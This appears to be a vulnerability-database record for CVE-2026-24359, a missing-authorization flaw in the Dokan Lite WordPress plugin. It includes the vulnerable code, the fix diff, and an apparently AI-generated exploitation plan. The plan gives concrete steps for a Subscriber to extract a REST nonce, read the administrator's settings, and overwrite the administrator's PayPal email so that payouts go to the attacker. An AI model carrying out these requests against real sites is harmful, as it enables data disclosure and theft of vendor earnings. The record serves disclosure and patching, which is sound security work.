[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmmiYP0KHZfQ6a-Zsbt6zHeyHCp5X-IqtpF8DpRw7kMc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-24359","dokan-ai-powered-woocommerce-multivendor-marketplace-solution-build-your-own-amazon-ebay-etsy-missing-authorization","Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy \u003C= 4.2.4 - Missing Authorization","The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.2.4. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","dokan-lite",null,"\u003C=4.2.4","4.2.5","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-16 00:00:00","2026-03-27 21:14:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb56abce9-82f8-4d73-bf97-cb1e2b65515b?source=api-prod",12,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fcore-store.asset.php","assets\u002Fjs\u002Fcore-store.js","assets\u002Fjs\u002Fstore-performance.js","dokan-class.php","dokan.php","includes\u002FDependencyManagement\u002FProviders\u002FCommonServiceProvider.php","includes\u002FREST\u002FStoreController.php","includes\u002FREST\u002FStoreSettingController.php","researched",false,3,"# Detailed Exploitation Research Plan: CVE-2026-24359\n\n## 1. Vulnerability Summary\nThe **Dokan Lite** plugin (up to version 4.2.4) contains a missing authorization vulnerability (IDOR) within its REST API `settings` endpoint. The `WeDevs\\Dokan\\REST\\StoreSettingController` class defines routes for retrieving and updating store settings. It does register a `permission_callback`, but that callback only verifies that the requester is logged in and resolves to a Dokan vendor object; because it calls `get_vendor()` without the request, it never inspects the supplied `vendor_id` and therefore never checks whether the requester is allowed to view or modify that vendor's settings.\n\nThis allows any authenticated user (e.g., a Subscriber) to view or modify the store settings (including PayPal\u002FBank payment details, store name, and address) of any other vendor or administrator on the site by specifying a `vendor_id` parameter.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings`\n- **Method**: `GET` (for information disclosure) and `POST`\u002F`PUT`\u002F`PATCH` (for unauthorized modification).\n- **Vulnerable Parameter**: `vendor_id` (query parameter; `WP_REST_Request::get_param()` also reads it from the request body or JSON body).\n- **Authentication**: Required (Subscriber level or higher).\n- **Required Header**: `X-WP-Nonce` (standard WordPress REST API nonce).\n\n## 3. Code Flow\n1.  **Registration**: In `includes\u002FREST\u002FStoreSettingController.php`, the `register_routes()` method registers the `\u002Fsettings` endpoint. Both the `READABLE` and `EDITABLE` routes use `get_settings_permission_callback` as the `permission_callback`.\n2.  **Permission Check**: `get_settings_permission_callback()` calls `$this->get_vendor()` with no arguments.\n3.  **Vendor Retrieval (Flawed)**: The `get_vendor($request = null)` method prioritizes a `vendor_id` parameter from the request. If `vendor_id` is provided, it fetches that user. If not, it uses the current user ID.\n4.  **Authorization Failure**:\n    - WordPress passes the `WP_REST_Request` object to the permission callback, but the callback's signature does not accept it, so the call `$this->get_vendor()` inside the callback always resolves to the **current user**. Since the current user is logged in, `dokan()->vendor->get()` returns a vendor object with a non-empty ID, and the check returns `true`.\n    - During the actual action (e.g., `update_settings`), the controller calls `$this->get_vendor( $request )`. This time, it processes the `vendor_id` parameter, shifting the context to the **target user**.\n5.  **Execution**: `update_settings` calls `dokan()->vendor->update( $target_vendor_id, $params )`, modifying the target user's metadata without verifying any relationship between the requester and the target.\n\n## 4. Nonce Acquisition Strategy\nThe endpoint is a standard WordPress REST API route. 
To interact with it while authenticated via cookies, a `wp_rest` nonce is required.\n\n1.  **Identify Enqueue**: Dokan's core scripts (like `core-store.js`) use `wp-api-fetch`. These scripts are typically enqueued on the WordPress Dashboard or Dokan Vendor Dashboard.\n2.  **Creation**: No special shortcode is required as standard WordPress functionality enqueues the REST nonce for logged-in users in the admin area.\n3.  **Extraction**:\n    - Login as a Subscriber.\n    - Navigate to `\u002Fwp-admin\u002F`.\n    - Use `browser_eval` to extract the nonce from the global `wpApiSettings` object.\n    - **JS Command**: `window.wpApiSettings?.nonce`\n\n## 5. Exploitation Strategy\n\n### Step 1: Information Disclosure (Optional but useful)\nRetrieve sensitive settings (e.g., payment email) of the Administrator (usually ID 1).\n- **Request Tool**: `http_request`\n- **Method**: `GET`\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1`\n- **Headers**: \n    - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Expected Response**: JSON object containing the administrator's store settings, social links, and payment method info.\n\n### Step 2: Unauthorized Modification\nChange the store name or payment email of the Administrator.\n- **Request Tool**: `http_request`\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1`\n- **Headers**:\n    - `Content-Type: application\u002Fjson`\n    - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Body**:\n    ```json\n    {\n        \"store_name\": \"Hacked by Subscriber\",\n        \"social\": {\n            \"fb\": \"https:\u002F\u002Ffacebook.com\u002Fattacker\"\n        },\n        \"payment\": {\n            \"paypal\": {\n                \"email\": \"attacker@evil.com\"\n            }\n        }\n    }\n    ```\n\n## 6. Test Data Setup\n1.  **Target**: Ensure an Administrator user exists (User ID 1).\n2.  
**Attacker**: Create a user with the `subscriber` role.\n3.  **Dokan Setup**: Ensure Dokan Lite is active. The plugin automatically treats users as \"vendors\" for the purpose of the `settings` endpoint.\n\n## 7. Expected Results\n- The `GET` request should return a `200 OK` with a JSON payload containing details that a Subscriber should not see for another user.\n- The `POST` request should return a `200 OK` and a response body mirroring the updated data.\n- The database state for the target user (ID 1) should reflect the injected values.\n\n## 8. Verification Steps\nAfter performing the `POST` request, verify the change using WP-CLI:\n```bash\n# Check the target user's dokan_profile_settings meta\nwp user meta get 1 dokan_profile_settings\n```\nExpected output: The `store_name` should be \"Hacked by Subscriber\" and the PayPal email should be updated.\n\n## 9. Alternative Approaches\nIf `vendor_id` is not accepted as a query parameter in some environments, try including it in the JSON body:\n```json\n{\n    \"vendor_id\": 1,\n    \"store_name\": \"Hacked via Body Param\"\n}\n```\nIf the `wpApiSettings` object is missing, the nonce can be found by searching the HTML source for `\"nonce\":\"...\"` within the script tags or by checking the `X-WP-Nonce` header in any network request made by the WordPress dashboard.","The Dokan Lite plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) via the REST API \u002Fsettings endpoint. Authenticated attackers, including those with Subscriber-level access, can view or modify the store settings (such as PayPal email addresses and store names) of any other vendor or administrator by providing a target user ID in the 'vendor_id' parameter.","\u002F\u002F includes\u002FREST\u002FStoreSettingController.php lines 35-71\npublic function register_routes() {\n    register_rest_route(\n        $this->namespace,\n        '\u002F' . 
$this->rest_base,\n        [\n            [\n                'methods'             => WP_REST_Server::READABLE,\n                'callback'            => [ $this, 'get_settings' ],\n                'permission_callback' => [ $this, 'get_settings_permission_callback' ],\n                'args'                => [\n                    'vendor_id' => [\n                        'required'          => false,\n                        'type'              => 'integer',\n                        'validate_callback' => function ( $param ) {\n                            return is_numeric( $param ) && (int) $param > 0;\n                        },\n                        'description'       => __( 'Optional vendor ID', 'dokan-lite' ),\n                    ],\n                ],\n            ],\n            [\n                'methods'             => WP_REST_Server::EDITABLE,\n                'callback'            => [ $this, 'update_settings' ],\n                'permission_callback' => [ $this, 'get_settings_permission_callback' ],\n                'args'                => [\n                    'vendor_id' => [\n                        'required'          => false,\n                        'type'              => 'integer',\n                        'validate_callback' => function ( $param ) {\n                            return is_numeric( $param ) && (int) $param > 0;\n                        },\n                        'description'       => __( 'Optional vendor ID', 'dokan-lite' ),\n                    ],\n                ],\n            ],\n        ]\n    );\n}\n\n---\n\n\u002F\u002F includes\u002FREST\u002FStoreSettingController.php lines 124-138\npublic function get_settings_permission_callback() {\n    $vendor = $this->get_vendor();\n\n    if ( is_wp_error( $vendor ) ) {\n        return $vendor;\n    }\n\n    if ( empty( $vendor->get_id() ) ) {\n        return new WP_Error( 'no_store_found', __( 'No vendor found', 'dokan-lite' ), [ 'status' => 404 ] );\n    }\n\n    
return true;\n}\n\n---\n\n\u002F\u002F includes\u002FREST\u002FStoreSettingController.php lines 147-166\nprotected function get_vendor( $request = null ) {\n    $vendor_id = is_a( $request, \\WP_REST_Request::class ) && $request->get_param( 'vendor_id' ) ? $request->get_param( 'vendor_id' ) : '';\n    if ( $vendor_id ) {\n        $vendor = dokan()->vendor->get( (int) $vendor_id );\n    } else {\n        $current_user = dokan_get_current_user_id();\n\n        if ( ! $current_user ) {\n            return new WP_Error( 'Unauthorized', __( 'You are not logged in', 'dokan-lite' ), [ 'code' => 401 ] );\n        }\n\n        if ( $current_user ) {\n            $vendor = dokan()->vendor->get( $current_user );\n        }\n    }\n\n    return $vendor;\n}","--- a\u002Fincludes\u002FREST\u002FStoreSettingController.php\n+++ b\u002Fincludes\u002FREST\u002FStoreSettingController.php\n@@ -124,8 +124,8 @@\n      *\n      * @return bool|WP_Error\n      *\u002F\n-    public function get_settings_permission_callback() {\n-        $vendor = $this->get_vendor();\n+    public function get_settings_permission_callback( $request ) {\n+        $vendor = $this->get_vendor( $request );\n \n         if ( is_wp_error( $vendor ) ) {\n             return $vendor;\n@@ -135,6 +135,10 @@\n             return new WP_Error( 'no_store_found', __( 'No vendor found', 'dokan-lite' ), [ 'status' => 404 ] );\n         }\n \n+        if ( ! current_user_can( 'manage_options' ) && dokan_get_current_user_id() !== $vendor->get_id() ) {\n+            return new WP_Error( 'dokan_rest_cannot_view', __( 'Sorry, you are not allowed to view or edit these settings.', 'dokan-lite' ), [ 'status' => rest_authorization_required_code() ] );\n+        }\n+\n         return true;\n     }","1. Authenticate to the WordPress site as a low-privileged user (e.g., Subscriber).\n2. Obtain a valid REST API nonce (X-WP-Nonce) from the dashboard's HTML source or global JS objects (window.wpApiSettings.nonce).\n3. 
To disclose sensitive store data of another user (e.g., the Administrator with ID 1), send a GET request to `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1` with the nonce header.\n4. To modify the target's settings, send a POST\u002FPUT request to `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?vendor_id=1` with a JSON payload containing fields to change, such as 'payment' -> 'paypal' -> 'email' to redirect vendor earnings to the attacker's account.","gemini-3-flash-preview","2026-04-18 03:34:10","2026-04-18 03:34:47",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags"]